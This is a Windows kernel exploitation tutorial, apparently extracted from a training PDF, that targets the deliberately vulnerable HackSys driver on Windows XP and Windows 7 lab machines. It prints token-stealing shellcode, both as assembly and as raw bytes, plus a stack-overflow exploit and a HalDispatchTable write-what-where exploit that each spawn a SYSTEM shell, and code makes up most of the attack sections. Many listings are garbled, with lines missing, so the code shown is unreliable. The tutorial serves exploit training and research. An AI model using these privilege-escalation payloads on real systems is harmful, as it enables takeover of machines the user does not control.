Hacking Training

Hacking Training 

Windows Kernel Exploitation 

v. 1.0 

Simone Cardona 

OSCP, OSCE 

www.hacking-training.com

Index 

Windows XP 32bit.......................................................................................................................................... 3 

Setting Up Lab............................................................................................................................................ 3 

Introducing HackSys Extreme Vulnerable Windows Driver ...................................................................... 6 

Kernel Internals ......................................................................................................................................... 6 

Access Token ............................................................................................................................................. 6 

Token Stealing Payload .............................................................................................................................. 8 

Stack Overflow ......................................................................................................................................... 10 

Arbitrary Memory Overwrite (Write-What-Where) ................................................................................ 18 

Get HalDispatchTable base address ........................................................................................................ 20 

Exploitation .............................................................................................................................................. 21 

Windows 7 32bit .......................................................................................................................................... 28 

Setting Up Lab.......................................................................................................................................... 28 

Changing Token Stealing Payload ............................................................................................................ 28 

Kernel Pool Internals ............................................................................................................................... 29 

Kernel Pool Layout ................................................................................................................................... 31 

Pool Feng Shui ......................................................................................................................................... 34 

Exploitation .............................................................................................................................................. 35 

www.hacking-training.com 1


Windows XP 32bit 

Setting Up Lab 

The first step is to configure all the working environment in order to be ready to exploit a specific kernel 

version. 

We will consider as Virtual Environment Software, VMware on a Windows 10 machine. 

As Virtual machine You need to install, in order to follow all the steps of this guide, Windows XP SP3 32bit. 

Into this machine the first thing to do is to modify the boot.ini file into the C:\ folder. 

Under the [operating systems] line You need to add at the end of line the following piece: 


Another essential step is to enable the Serial Port on VMware: 

Go to Settings->Add->Serial Port and follow the steps adding the following settings: 

Now You need to install WinDbg (x86) that You can easily find on the net. 

Go to File->Kernel Debug->COM and add the following settings: 


At this point, if you have already started the Windows XP You need to restart it…and You will have WinDbg 

connected to the VM. 

You can easily check this, infact It will be showed the string “Connected to Windows XP 2600 x86 ….” 

As last step You need to install Microsoft Visual C++ 2010 Express in order to compile the Exploit. 


Introducing HackSys Extreme Vulnerable Windows Driver 

From the Hacksys github readme file We get: 

“HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security 

enthusiasts to learn and polish their exploitation skills at Kernel level.” 

You can get it from https://github.com/hacksysteam/HackSysExtremeVulnerableDriver.git 

At this point We need to register the driver and also to start the service. 

In order to accomplish this task You could use OSR Loader that you can find online after a short 

registration. 

Kernel Internals 

We can start looking at API DeviceIocontrol() 

BOOL WINAPI DeviceIoControl( 

_In_ HANDLE hDevice, 

_In_ DWORD dwIoControlCode, 

_In_opt_ LPVOID lpInBuffer, 

_In_ DWORD nInBufferSize, 

_Out_opt_ LPVOID lpOutBuffer, 

_In_ DWORD nOutBufferSize, 

_Out_opt_ LPDWORD lpBytesReturned, 

_Inout_opt_ LPOVERLAPPED lpOverlapped 

); 

The important parameters are the device driver HANDLE, the I/O control code and also the addresses of 

input and output buffers. 

When this API is called, the I/O Manager makes an IRP (I/O Request Packet) request and delivers it to the 

device driver. 

There are also three types of data transfer mechanism: Buffered I/O, Direct I/O and Neither Buffered nor 

Direct I/O. 

Access Token 

Every running process has an access token, a set of information that describes the privileges of it. 

The first essential step to understand this concept is to find the token associated with the process; this 

operation involves locating the EPROCESS structure. 

Let’s consider that We have the debugger connected in kernel mode, so let’s run the following command: 

>!process 0 0 


This command serves to find the token address inside the EPROCESS structure. 


Token Stealing Payload 

This technique consists in exchanging of the target process’s access token with the access token of a more 

privileged process. 

Let’s look how this shellcode appear: 

VOID TokenStealingShellcodeWin() { 

__asm { 

pushad ;(1) 

mov eax, fs:[KTHREAD_OFFSET] ; (2) 

mov eax, [eax + EPROCESS_OFFSET] 

mov ecx, eax 

mov ebx, [eax + TOKEN_OFFSET] 

mov edx, SYSTEM_PID 

SearchSystemPID: 

mov eax, [eax + FLINK_OFFSET] 

sub eax, FLINK_OFFSET 

cmp[eax + PID_OFFSET], edx 

jne SearchSystemPID 

mov edx, [eax + TOKEN_OFFSET] 

mov[ecx + TOKEN_OFFSET], edx 

popad 

} 

} 

xor eax, eax 

add esp, 12 

pop ebp 

ret 8 

1) The first step is to save the driver registers so We can restore them later. 

2) Now the second step is to find the target process’s EPROCESS structure 

It’s possible to find this structure looking at the KPRCB (Kernel Processor Control Block), that holds a 

reference to the ETHREAD structure which holds a reference to the current EPROCESS structure. 

In order to well understand these steps I’ll use the Windows API to inspect some process internals. 

The API PsGetCurrentProcess() is used to get the process object within the EPROCESS structure. 

So let’s analyze how this API do this job: 


But wait…these instructions are familiar to us, infact these are the first two instructions of our shellcode! 

Now We have found the KTHREAD_OFFSET (0x124) and also the EPROCESS_OFFSET (0x044). 

Let’s continue this process, this time viewing the entire EPROCESS structure: 

>dt –b –v _EPROCESS 

Here We find the others elements: 

TOKEN_OFFSET (0x0c8) 

SYSTEM_PID (0x004), is the pid of process with NT AUTHORITY/SISTEM 

FLINK_OFFSET (0x088) 

PID_OFFSET (0x084) 

Now We are ready to write our C code: 

#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread 


#define EPROCESS_OFFSET 0x044 // nt!_KTHREAD.ApcState.Process 

#define PID_OFFSET 0x084 // nt!_EPROCESS.UniqueProcessId 

#define FLINK_OFFSET 0x088 // nt!_EPROCESS.ActiveProcessLinks.Flink 

#define TOKEN_OFFSET 0x0c8 // nt!_EPROCESS.Token 

#define SYSTEM_PID 0x004 // SYSTEM Process PID 


__asm { 

pushad ;(1) 



mov ecx, eax 










popad 

} 

} 

xor eax, eax 

add esp, 12 

pop ebp 

ret 8 

Stack Overflow 

This kind of vulnerability should be familiar. 

It have the same steps to the user application exploitation. 

Attach WinDbg to the WinXP VM and let’s start crashing it with this code: 

#include "stdafx.h" 

#include 

#include 


#include 

#include 

//Definition taken from HackSysExtremeVulnerableDriver.h 

#define HACKSYS_EVD_IOCTL_STACK_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, 

METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA) 

int _tmain(int argc, _TCHAR* argv[]) 

{ 

DWORD lpBytesReturned; 

PVOID pMemoryAddress = NULL; 

PULONG lpInBuffer = NULL; 

LPCSTR lpDeviceName = (LPCSTR) "\\\\.\\HackSysExtremeVulnerableDriver"; 

SIZE_T nInBufferSize = 1024 * sizeof(ULONG); 

printf("Getting the device handle\r\n"); 

HANDLE hDriver = CreateFile(lpDeviceName, 

GENERIC_READ | GENERIC_WRITE, 

FILE_SHARE_READ | FILE_SHARE_WRITE, 

NULL 

OPEN_EXISTING, 

FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED 

NULL 

if (hDriver == INVALID_HANDLE_VALUE) { 

printf("Failed to get device handle :( 0x%X\r\n", GetLastError()); 

return 1; 

} 

printf("Got the device Handle: 0x%X\r\n", hDriver); 

printf("Allocating Memory For Input Buffer\r\n"); 

lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 

nInBufferSize); 

if (!lpInBuffer) { 

printf("HeapAlloc failed :( 0x%X\r\n", GetLastError()); 

return 1; 

} 

printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize); 

printf("Input buffer address: 0x%p\r\n", lpInBuffer); 

printf("Filling buffer with A's\r\n"); 

RtlFillMemory((PVOID)lpInBuffer, nInBufferSize, 0x41); 

printf("Sending IOCTL request\r\n"); 

DeviceIoControl(hDriver, 

HACKSYS_EVD_IOCTL_STACK_OVERFLOW, 

(LPVOID)lpInBuffer, 

(DWORD)nInBufferSize, 

NULL, 

0, 

&lpBytesReturned, 

NULL); 


} 

printf("IOCTL request completed, cleaning up da heap.\r\n"); 

HeapFree(GetProcessHeap(), 0, (LPVOID)lpInBuffer); 

return 0; 

Take some time to understand it, it’s simple. 

First of all We get the device handle via CreateFile() API, then We zero out the buffer nInBufferSize, next 

We fill the buffer with 1024 “A” == 0x41 and finally We send this buffer to the driver handle via 

DeviceIoControl() API. 

Now the EIP is equal to 41414141 and also EBP, use Kali Linux 2.0 or also mona to create a cyclic pattern: 

#locate pattern_create 

#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb –l 3056 

Now We need to modify the exploit.cpp: 


#include 

#include 

#include 

#include 


METHOD_NEITHER, FILE_ANY_ACCESS) 


{ 




LPCWSTR lpDeviceName = L"\\\\.\\HackSysExtremeVulnerableDriver"; 

SIZE_T nInBufferSize = 768 * sizeof(ULONG); 

printf("Getting device handle\n"); 




NULL, 


FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, 

NULL); 


} 



return 1; 



lpInBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nInBufferSize); 

if (!lpInBuffer) { 

printf("HeapAlloc failed :( 0x%X\r\n", GetLastError()); 

return 1; 

} 

printf("Input buffer allocated as 0x%X bytes.\r\n", nInBufferSize); 

printf("Input buffer address: 0x%p\r\n", lpInBuffer); 


char *pattern = 

"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac 

7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5 

Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 

Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5A 

l6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1A 

o2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8A 

q9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8A 

t9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5A 

w6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3A 

z4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2 

Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf 

1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0 

Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2 

Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9B 

o0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7 

Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt 

8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5 

Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz 

4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2C 

c3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1 

Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci 

1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3 

Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0C 

o1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8 


Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9 

Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6C 

w7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5C 

z6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc 

3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df 

0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh 

8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8 

Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn 

5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1 

Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9D 

t0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7D 

v8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx"; 

memcpy(lpInBuffer, pattern, nInBufferSize); 




(LPVOID)lpInBuffer, 

(DWORD)nInBufferSize, 

NULL, 

0, 


NULL); 

} 


HeapFree(GetProcessHeap(), 0, (LPVOID)lpInBuffer); 

return 0; 


After We have run the exploit We need to get the offset to EIP: 

#/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb –l 3056 –q 72433372 

[*] Exact match at offset 2080 

So now We have all the information to write the final working exploit: (I’ll explain soon) 


#include 

#include 

#include 

#include 











__asm { 

pushad 

mov eax, fs:[KTHREAD_OFFSET] 


mov ecx, eax 










popad 

} 

} 

; recovery 

xor eax, eax; Set NTSTATUS SUCCEESS 

add esp, 12; fix the stack 

pop ebp 

ret 8 


{ 










NULL, 



NULL); 

} 



return 1; 




printf("Payload at: %p\n", TokenStealingShellcodeWin); 

CHAR *chBuffer; 

chBuffer = (CHAR *)malloc(2084); 

printf("Buffer at: %p\n", &chBuffer); 

memset(chBuffer, 0x41, 2048); 

memset(chBuffer +2048, 0x42, 32); 

chBuffer[2080] = (DWORD)&TokenStealingShellcodeWin & 0x000000FF; 

chBuffer[2080 + 1] = ((DWORD)&TokenStealingShellcodeWin & 0x0000FF00) >> 8; 

chBuffer[2080 + 2] = ((DWORD)&TokenStealingShellcodeWin & 0x00FF0000) >> 16; 

chBuffer[2080 + 3] = ((DWORD)&TokenStealingShellcodeWin & 0xFF000000) >> 24; 




chBuffer, 2084, 

NULL, 

0, 


NULL); 

system("cmd.exe"); 



} 

CloseHandle(hDriver); 

return 0; 

Ok…now I’ll explain the essential step: 

First of all We are communicating with the driver via CreateFile API, then We are allocating a buffer of 2080 

followed by the address of our Function. Finally We are sending this crafted buffer to the driver. 

Arbitrary Memory Overwrite (Write-What-Where) 

In this kind of vulnerability the driver writes an arbitrary value into kernel-land. So We are able to overwrite 

a Kernel address with our specific address. 

In this case the driver takes two pointers: one suggest what the driver will write to memory and the other 

where the driver will write. 

So now the question is…what address are We going to overwrite? This address should be executed! 

We can overwrite a Kernel dispatch table pointer, the HalDispatchTable that holds function pointers. 

HAL means Hardware Abstraction Layer. 


The first essential step is to find the base address of HalDispatchTable; then We need to find a function 

pointer that We can overwrite and that is also called by a user-land routine. 

The second function pointer of the HalDispatchTable is called by the NtQueryIntervalProfile() API, so We 

only need to overwrite it with our arbitrary value. 

The function above cited call KeQueryIntervalProfile()which call HalDispatchTable+4. 

Let’s analyze the vulnerable source code: 

DbgPrint("[+] Triggering Arbitrary Overwrite\n"); 

// Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability 

// because the developer is writing the value pointed by 'What' to memory location 

// pointed by 'Where' without properly validating if the values pointed by 'Where' 

// and 'What' resides in User mode 

*(UserWriteWhatWhere->Where) = *(UserWriteWhatWhere->What); 

The comments are self-explanatory. 


We can see that the Driver Function expect the following structure: 

typedef struct _WRITE_WHAT_WHERE { 

PULONG What; 

PULONG Where; 

} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 

So We can easily copy this piece of code and reuse it into our exploit! 

Let’s start writing our exploit. 

The first thing to do is get the IOCTL code from HackSysExtremeVulnerableDriver.h 

#define HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, 


Now We need to obtain the HalDispatchTable base address… 

Get HalDispatchTable base address 

In order to accomplish this task We need to follow these steps: 

(Taken from www.dimitrifourny.com and from 

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/) 

1. Load ntoskrnl.exe with LoadLibrary (because HalDispatchTable is exported by this exe) 

2. Use GetProcAddress to find HalDispatchTable address 

3. Search the image base address of ntoskrnl with NtQuerySystemInformation 

4. Obtain the final address with a calculation: 

HalDispatchTable address – ntoskrnl userland address + ntoskrnl base address in kernelland 

We will write a function to accomplish this task: 

Step 1 and 2: 

PVOID ntoskrnl = LoadLibrary("ntoskrnl.exe"); 

PVOID HalDispatchTable = GetProcAddress(ntoskrnl, "HalDispatchTable"); 

Step 3: 

typedef enum { 

SystemBasicInformation, 

SystemProcessorInformation, 

SystemPerformanceInformation, 


SystemTimeOfDayInformation, 

SystemPathInformation, 

SystemProcessInformation, 

SystemCallCountInformation, 

SystemDeviceInformation, 

SystemProcessorPerformanceInformation, 

SystemFlagsInformation, 

SystemCallTimeInformation, 

SystemModuleInformation 

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 

typedef struct 

{ 

ULONG ModulesCount; 

SYSTEM_MODULE Modules[0]; 

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 

DWORD sizeInfo = 0; 

PSYSTEM_MODULE_INFORMATION moduleList = NULL; 

PVOID kernelBase = NULL; 

ntdll = GetModuleHandle("ntdll.dll"); 

_NtQuerySystemInformation NtQuerySystemInformation = GetProcAddress(ntdll, 

"NtQuerySystemInformation"); 

NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &sizeInfo); 

moduleList = (PSYSTEM_MODULE_INFORMATION) malloc(sizeInfo); 

error = NtQuerySystemInformation(SystemModuleInformation, moduleList, sizeInfo, 

NULL); 

kernelBase = moduleList->Modules[0].ImageBaseAddress; 

free(moduleList); 

Step 4: 

HalDispatchTable = (DWORD) HalDispatchTable - (DWORD) ntoskrnl + (DWORD) 

kernelBase; 

Exploitation 

Here You’ll note that there are some modifications regard the above code: 


#include 

#include 

#include 

#include 


#define HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, 








#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) 


__asm { 

; initialize 

pushad; save registers state 

mov eax, fs:[KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread 

mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process 

mov ecx, eax; Copy current _EPROCESS structure 

mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token 

mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4 


mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink 


cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId 


mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token 

mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM 

; to current process 

popad; restore registers state 

} 

} 

typedef struct _WRITE_WHAT_WHERE { 

PULONG What; 

PULONG Where; 

} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE; 


typedef enum { 

SystemBasicInformation, 

SystemProcessorInformation, 

SystemPerformanceInformation, 

SystemTimeOfDayInformation, 

SystemPathInformation, 

SystemProcessInformation, 

SystemCallCountInformation, 

SystemDeviceInformation, 

SystemProcessorPerformanceInformation, 

SystemFlagsInformation, 

SystemCallTimeInformation, 

SystemModuleInformation 

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 


{ 

PVOID Reserved1; 

PVOID Reserved2; 

PVOID Base; 

ULONG ImageSize; 

ULONG Flags; 

WORD Id; 

WORD Rank; 

WORD w018; 

WORD NameOffset; 

CHAR ImageName[256]; 

} SYSTEM_MODULE, *PSYSTEM_MODULE; 


{ 

ULONG ModulesCount; 

SYSTEM_MODULE Modules[0]; 

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 

typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS 

SystemInformationClass, 

OUT PVOID SystemInformation, 

IN ULONG SystemInformationLength, 

OUT PULONG ReturnLength); 

typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, 


OUT PULONG Interval); 


{ 





PWRITE_WHAT_WHERE WriteWhatWhere = NULL; 

PVOID HalDispatchTable = NULL; 

PVOID HalDispatchTable4 = NULL; 

HMODULE ntoskrnl = NULL; 

PVOID kernelBase = NULL; 

HMODULE ntdll = NULL; 

NtQuerySystemInformation_t NtQuerySystemInformation; 

NTSTATUS NtStatus = STATUS_UNSUCCESSFUL; 

SIZE_T ReturnLength; 

PSYSTEM_MODULE_INFORMATION pSystemModuleInformation; 

PCHAR KernelImage; 

PVOID KernelBaseAddressInKernelMode; 

HMODULE hKernelInUserMode = NULL; 

PVOID EopPayload = &TokenStealingShellcodeWin; 

NtQueryIntervalProfile_t NtQueryIntervalProfile; 

ULONG Interval = 0; 





NULL, 



NULL); 

} 



return 1; 


WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc( 

GetProcessHeap(), 


HEAP_ZERO_MEMORY, 

sizeof(WRITE_WHAT_WHERE)); 

//Start 

//Step 3 

ntdll = GetModuleHandleA("ntdll.dll"); 

NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(ntdll, 

"NtQuerySystemInformation"); 

NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); 

pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), 

HEAP_ZERO_MEMORY, 

ReturnLength); 

NtStatus = NtQuerySystemInformation(SystemModuleInformation, 

pSystemModuleInformation, 

ReturnLength, 

&ReturnLength); 

KernelBaseAddressInKernelMode = pSystemModuleInformation->Modules[0].Base; 

KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Modules[0].ImageName), '\\') + 1; 

//Step 1 and 2 

printf("KernelImage: %s", KernelImage); 

hKernelInUserMode = LoadLibraryA(KernelImage); 

HalDispatchTable = (PVOID)GetProcAddress(hKernelInUserMode, "HalDispatchTable"); 

//Step 4 

HalDispatchTable = (PVOID)((ULONG)HalDispatchTable - (ULONG)hKernelInUserMode); 

HalDispatchTable = (PVOID)((ULONG)HalDispatchTable + 

(ULONG)KernelBaseAddressInKernelMode); 

HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); 

FreeLibrary(ntdll); 

FreeLibrary(hKernelInUserMode); 


End 

HalDispatchTable4 = (PVOID)((ULONG)HalDispatchTable + sizeof(PVOID)); 

WriteWhatWhere->What = (PULONG)&EopPayload; 

WriteWhatWhere->Where = (PULONG)HalDispatchTable4; 

printf("\t\t\t[+] WriteWhatWhere: 0x%p\n", WriteWhatWhere); 

printf("\t\t\t[+] WriteWhatWhere->What: 0x%p\n", WriteWhatWhere->What); 

printf("\t\t\t[+] WriteWhatWhere->Where: 0x%p\n", WriteWhatWhere->Where); 

printf("\t\t[+] EoP Payload: 0x%p\n", EopPayload); 



HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE, 

(LPVOID)WriteWhatWhere, 

sizeof(WRITE_WHAT_WHERE), 

NULL, 

0, 


NULL); 

//Trigger the memory overwrite 

ntdll = LoadLibraryA("ntdll.dll"); 

NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(ntdll, 

"NtQueryIntervalProfile"); 

NtQueryIntervalProfile(0x1337, &Interval); 

HeapFree(GetProcessHeap(), 0, (LPVOID)WriteWhatWhere); 

system("cmd.exe"); 

printf("IOCTL request completed!\r\n"); 

} 

CloseHandle(hDriver); 

return 0; 


Step 1 and 2 

printf("KernelImage: %s", KernelImage); 

hKernelInUserMode = LoadLibraryA(KernelImage); 

Here We can see that the kernel image is loaded dynamically, infact in this case is ntkrnlpa.exe, different 

from ntoskrnl.exe. 

Here the final screenshot: 


Windows 7 32bit 

For debugging reason I decided to change VM for the Pool Exploitation. The Windbg !pool command is not 

supported in the Windows XP and thit restrict the debugging possibilities. 

Furthermore this time I’ll use a python exploit in order to simplify the script. 

Setting Up Lab 

Install Windows 7 32bit and enable the serial port on VMware. 

In order to start the debugging You also need to run the following command in a privileged cmd: 

bcdedit /debug ON 

bcdedit /dbgsettings SERIAL DEBUGPORT:2 BAUDRATE:115200 

Changing Token Stealing Payload 

Let’s start from the previous shellcode: 


__asm { 

pushad ;(1) 



mov ecx, eax 










popad 

xor eax, eax 


} 

} 

add esp, 12 

pop ebp 

ret 8 

this time the offsets are: 

KTHREAD_OFFSET (0x124) 

EPROCESS_OFFSET (0x050) 

TOKEN_OFFSET (0x0f8) 

SYSTEM_PID (0x004) 

FLINK_OFFSET (0x0b8) 

PID_OFFSET (0x0b4) 

Let’s compile our shellcode for the python exploit, here the final shellcode: 

\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80 

\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00 

\x00\x89\x91\xf8\x00\x00\x00\x61 

Kernel Pool Internals 

(From https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf and 

https://blogs.msdn.microsoft.com/ntdebugging/2013/06/14/understanding-pool-corruption-part-1-bufferoverflows/ 

) 

“Pool is kernel mode memory used as a storage space for drivers. … Because many pool allocations are 

stored in the same page, it is critical that every driver only use the space they have allocated. If DriverA 

uses more space than it allocated they will write into the next driver’s space (DriverB) and corrupt DriverB’s 

data. “ 

Every kernel pool requires a management structure that is the pool descriptor; this track the number of 

